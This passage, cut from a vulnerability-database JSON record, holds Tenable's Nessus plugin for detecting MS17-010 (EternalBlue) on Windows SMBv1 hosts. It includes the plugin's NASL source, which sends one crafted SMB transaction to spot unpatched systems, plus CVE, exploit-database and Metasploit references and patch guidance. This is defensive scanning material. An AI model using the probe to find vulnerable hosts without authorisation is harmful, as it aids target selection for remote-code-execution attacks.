["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": 
["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-18T01:26:56", "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", 
value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # 
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: 
SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! 
get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-03-18T01:26:56", "differentElements": ["modified", "reporter", "sourceData"], "edition": 4}, {"bulletin": {"id": "MS17-010.NASL", "hash": "53fe543478464e317e6d410772351ac0fc24836cd062b4c9d916db9c3645ff92", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due 
to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-03-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-10-16T07:45:32", "history": [], "viewCount": 7135, "enchantments": {"dependencies": {"modified": "2020-10-16T07:45:32", "references": [{"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 
"SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"], "type": "attackerkb"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", 
"THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-16T07:45:32", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", 
value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # 
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n 